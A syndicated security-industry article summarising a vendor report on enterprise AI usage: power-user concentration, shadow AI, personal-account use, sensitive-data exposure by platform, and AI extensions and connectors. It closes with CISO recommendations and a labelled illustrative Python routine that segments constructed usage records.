The common perception is that "everyone uses AI now". The report paints a much more nuanced picture. While nearly half of enterprise users interacted with AI tools over the past year, only 18% use AI on a weekly basis. This suggests that most employees remain casual users.

At first glance, that sounds like good news for security teams. Fewer users should mean lower risk. But the report found the opposite.

Enterprise AI activity is heavily concentrated among a very small group of employees. While half of the users had 12 AI conversations or fewer, the top 5% generated at least 144 conversations. These same users also engaged in much deeper interactions, averaging 18 prompts per conversation compared to the average of 2.

This creates a new class of "AI power users" that conduct far more conversations, interact across multiple AI platforms, and engage in significantly deeper prompt chains than average employees.

The result: AI risk is not distributed evenly across the organization. A relatively small group of users drives a disproportionate amount of enterprise AI exposure.

ChatGPT Is Still Dominating Enterprise AI Usage, But Copilot Is Closing the Gap

Despite the rapid growth of enterprise copilots, ChatGPT remains the dominant AI platform inside enterprises by a significant margin. It accounts for 36% of enterprise AI users and more than 55% of all AI conversations. That gap matters because it shows ChatGPT users are far more active than users of competing platforms.

Copilot M365 is growing quickly, reaching 29% adoption and nearly a quarter of enterprise AI conversations. The growth of Copilot also signals something important: enterprise AI usage is starting to split between governed enterprise-native AI and consumer-driven AI adoption. But beyond those two leaders, most AI platforms remain far behind despite the attention they receive.

While Copilot M365 usage is largely tied to corporate-managed Microsoft environments, where organizations typically maintain stronger visibility and governance controls, Gemini presents a very different risk profile. Most enterprise Gemini usage still happens through the regular consumer version, not Gemini Enterprise. In many cases, employees access it through personal accounts and unmanaged environments. That means organizations often have little visibility into how data is retained, whether prompts are used for model training, or how enterprise information is ultimately handled.

The implication is significant: not all enterprise AI adoption carries the same level of risk. The real governance challenge increasingly comes from consumer AI usage operating inside enterprise workflows under the appearance of legitimate productivity tools.

Shadow AI Is No Longer A Few Applications; It's a Long Tail of Under-the-Radar AI Apps

Most organizations still think about Shadow AI as employees using an unapproved chatbot. That definition is already outdated.

The LayerX research shows that enterprise AI usage is rapidly fragmenting across a growing ecosystem of AI tools, embedded assistants, AI browser extensions, AI search engines, coding copilots, and AI-powered SaaS features that often operate outside traditional visibility and governance controls.

Nearly 30% of enterprise users already use multiple AI platforms, while the top 5% interact with six or more AI applications. Employees are no longer relying on a single assistant for isolated tasks. They are combining multiple AI systems inside the same workflows, often switching between tools depending on the task, data type, or convenience.

This is what modern Shadow AI actually looks like. It's the growing long tail of AI tools that organizations struggle to see, track, or govern. In many cases, organizations may not even realize AI is being used at all, creating a far larger governance challenge than most organizations anticipate.

Enterprise AI Usage Is Far More Personal Than Organizations Realize

Most organizations assume that if employees use AI for work, they will naturally use corporate-managed AI environments. But that's not true.

Nearly half of all enterprise AI conversations happen through personal identities rather than corporate-managed accounts. What's even more concerning is that over 14% of conversations conducted with corporate identities are tied to personal AI licenses.

This creates a major governance blind spot: when employees use personal AI accounts, organizations lose visibility into retention policies, auditability, model training exposure, and how enterprise data is ultimately handled. Sensitive company information can move into external AI ecosystems without centralized oversight or policy enforcement.

What makes this particularly surprising is that the divide is not just about identities. It is increasingly shaping platform selection itself.

Enterprise-focused platforms such as Copilot M365 and Gemini Enterprise are used primarily through corporate-managed accounts. Meanwhile, platforms like ChatGPT, Claude, and DeepSeek remain dominated by personal usage.

This means the enterprise AI problem is no longer just about AI applications. It is increasingly becoming a "personal AI" and governance problem.

Sensitive Data Flows Into All AI Platforms, With DeepSeek and ChatGPT The Worst Culprits

The report found that more than 6% of enterprise AI conversations already contain sensitive data. Breaking that down by category, personal data was by far the most common, appearing in 5.81% of conversations, while financial and IT-related data appeared less frequently but still represented meaningful exposure.

DeepSeek showed the highest sensitive data exposure rate at 12.63% of conversations. ChatGPT followed at 8.38%. Copilot M365 showed a significantly lower exposure rate at 3.65%.

This suggests enterprise-integrated AI platforms may operate within more controlled governance environments, while consumer-oriented AI tools continue to see much riskier usage patterns.

The question is no longer whether employees will share sensitive data with AI systems. They already are. The real challenge is understanding where it happens, how often, and through which identities and platforms.

AI Extensions and Connectors Are Quietly Expanding the AI Risk Surface

The report also highlights two fast-growing AI channels that many organizations are barely tracking today: AI browser extensions and AI connectors.

About 15% of enterprise users already run at least one AI browser extension. Nearly 75% of these extensions request high or critical browser permissions. More than 16% already have known vulnerabilities.

At the same time, AI connectors are increasingly linking AI systems directly to enterprise applications like SharePoint, GitHub, Slack, Atlassian, and Google Workspace.

This means that AI systems are no longer limited to employees manually pasting information into chatbot windows. They are increasingly being granted persistent, programmatic access to enterprise systems, documents, collaboration platforms, and internal knowledge repositories. This fundamentally changes the nature of enterprise AI risk.

Turning Insight Into Action: The Path Forward for CISOs

The report makes one thing clear: traditional AI governance approaches are falling behind how employees actually use AI. It outlines a clear direction for security leaders:

  • Identify and Monitor High-Risk AI Power Users: AI risk is highly concentrated among a small group of employees who rely heavily on AI across multiple platforms and expose significantly more sensitive data than average users. Treating all AI usage equally wastes resources and misses the highest-risk behavior.
  • Stop Focusing Only on "Approved AI": The biggest visibility gap is the growing long tail of AI tools, embedded assistants, browser extensions, AI search engines, and connectors quietly spreading across the enterprise.
  • Block Personal Account Usage as Active Shadow AI: Unmanaged personal AI accounts and personal AI licenses expose sensitive enterprise workflows to uncontrolled AI environments. Enforcing corporate AI identities and blocking personal account usage helps ensure that AI interactions, prompts, and data flows remain visible, governed, and protected under enterprise security controls.
  • Shift From "Block or Allow" to Inline AI Guardrails: Blocking AI outright is no longer realistic, and an "allow-all" approach is equally risky. Organizations need inline guardrails that monitor prompts, uploads, responses, and AI-driven actions in real time to prevent sensitive data exposure without disrupting productivity.
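As an added example (not LayerX's code or the report's methodology), the routine below applies the segmentation the report describes to constructed conversation records: top-5% conversation volume to find power users, corporate versus personal identity by mail domain, and per-platform sensitive-data rate. The record fields, the platform names as written, and the `corp.example` corporate domain are assumptions.

```python
"""Segment AI usage telemetry into power users, personal identities and exposure.
Added example; the conversation records are constructed and the fields are
assumptions, not the report's schema. One tuple = one AI conversation."""
from collections import Counter

CORP_DOMAINS = {"corp.example"}  # assumption: what counts as a corporate identity

# Constructed: (identity, platform, prompts in conversation, sensitive data present)
CONVERSATIONS = [
    ("alice@corp.example", "chatgpt", 22, True),
    ("alice@corp.example", "chatgpt", 15, False),
    ("alice@corp.example", "deepseek", 19, True),
    ("alice@gmail.example", "deepseek", 17, True),
    ("alice@gmail.example", "chatgpt", 9, False),
    ("bob@corp.example", "copilot-m365", 2, False),
    ("bob@corp.example", "copilot-m365", 3, False),
    ("carol@corp.example", "copilot-m365", 1, False),
    ("dave@corp.example", "gemini", 2, False),
    ("erin@outlook.example", "chatgpt", 4, True),
]


def identity_is_personal(user):
    return user.rsplit("@", 1)[1] not in CORP_DOMAINS

def power_users(records, top_fraction=0.05):
    """Identities whose conversation count puts them in the top `top_fraction`
    (with few identities this degrades to the single most active one)."""
    counts = Counter(u for u, *_ in records)
    ranked = sorted(counts.values(), reverse=True)
    threshold = ranked[max(1, int(len(ranked) * top_fraction)) - 1]
    return sorted(u for u, c in counts.items() if c >= threshold)

def personal_identity_share(records):
    """Fraction of conversations held under a non-corporate identity."""
    return sum(identity_is_personal(u) for u, *_ in records) / len(records)

def exposure_rate_by_platform(records):
    """Per platform, fraction of conversations containing sensitive data."""
    total, sensitive = Counter(), Counter()
    for _, platform, _, has_sensitive in records:
        total[platform] += 1
        sensitive[platform] += has_sensitive
    return {p: sensitive[p] / total[p] for p in total}

def high_risk_identities(records, top_fraction=0.05):
    """Power users who sent sensitive data, plus any personal identity that did."""
    heavy = set(power_users(records, top_fraction))
    return sorted({u for u, _, _, s in records if s and (u in heavy or identity_is_personal(u))})
```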

Download the full State of AI Usage report from here

This article is a contributed piece from one of our valued partners.



from The Hacker News https://ift.tt/5qxzEi4
via IFTTT